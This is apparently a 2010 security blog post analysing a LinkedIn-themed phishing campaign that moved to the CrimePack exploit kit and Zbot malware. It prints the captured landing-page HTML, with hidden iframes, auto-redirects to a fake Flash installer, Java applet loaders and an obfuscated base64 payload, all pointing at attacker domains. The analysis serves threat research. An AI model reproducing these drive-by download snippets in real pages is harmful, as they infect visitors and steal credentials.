Full disclousure deep technical analisys below. Beware !!!

Sep 29, 2010

Linkedin Phishing Massive Campaign moved to use CrimePack + Zbot.FX

As soon as 9/29/2010 it seems that the malguys changed the exploit pack used in LinkedIn phishing massive campaign.

The spam mail was always a “Linkedin like” reminder:

mail

The URL inside refer to http://qfco8kkt.info/ 

that redirect to http://kerstdisplays.nl/1.html.

 

At first check this page was

BEFORE
PLEASE WAITING.... 4 SECONDS
<meta http-equiv="refresh" content="4;url=
http://medicineni.com" />
<iframe width="0" height="0" src="
http://pydukog.co.cc/wiki/index.php?past=2&action=boz&message=168&str=0"></iframe>

http://medicineni.com –> Pharmacy Express website…

 

then later chaged to

<body>
<a href="
http://dewitnieuws.nl/flash_player_07.78.exe"><img
style="border: 0px solid ; width: 499px; height: 158px;" alt=""
src="
http://dewitnieuws.nl/1.JPG"></a>
</body>

<meta http-equiv="refresh" content="4;url=http://dewitnieuws.nl/flash_player_07.78.exe" />
<iframe width="0" height="0" src="
http://pydukog.co.cc/wiki/index.php?past=2&action=boz&message=168&str=0"></iframe>

http://dewitnieuws.nl/flash_player_07.78.exe is Zbot.FX (MD5 4f56196d437be7e1bfecefb92b83872d) Anubis Automated Analisys

The common part referred by http://pydukog.co.cc/wiki/index.php?past=2&action=boz&message=168&str=0

took us to crypted code seem belonging to CrimePack exploit kit:

<html><head></head><body>Loading...<applet code="cpak.Crimepack.class" archive="http://pydukog.co.cc/wiki/jar5.php" width="666" height="300"><param name="data" value="http://pydukog.co.cc/wiki/exe.php?x=jar5"></applet><applet code="Exploit.class" archive="http://pydukog.co.cc/wiki/j.php" width="666" height="300"><param name="data" VALUE="http://pydukog.co.cc/wiki/exe.php?x=jjar"></applet><div id="page" style="display: none">ZnVu Y3 R pb24gSnVtcEF 3YXko K Q0Kew0K CXdpbmRvdy5vcGVuK Cdo dHRwOi8vd 3 d3Lmdvb2d s ZS5jb20 vNDA0Lyc sICd fc2VsZ icpOw0KfQ0KDQpmd W5 jdGlvbiB K R FQoKQ0Ke w0K CXRye Q0KCXs JDQ oJCXZhciB 1 ID0 g J2h 0dHA6IC1KLWp hciA tSlxcXFxw

..

..

aWYgKF9JRTcgJiYgX1hQKQ 0Kew0KC XNldF R pb WV vdXQg KE hDUC wgdGlt KTs N Cgl0aW 0gKz0 gMTAw MDsNCn 0 NCg0KaWYgKF9J RTYpDQp7DQoJc2V0VGl tZW91dCA o TURBQywgdG ltK TsNCgl 0 aW0gKz0g M TAwMDs NCn0NC g 0KD Q ppZiAodGlt I D4 gMCkg dGlt ICs9IDEw MDAwOw0KDQpzZXRUaW1lb3 V 0IChKd W1w QXdhe SwgdG ltK TsNCg== </div><script type="text/javascript" src="http://pydukog.co.cc/wiki/js.php"></script></body></html>

Further analysis will follow...

No comments:

Post a Comment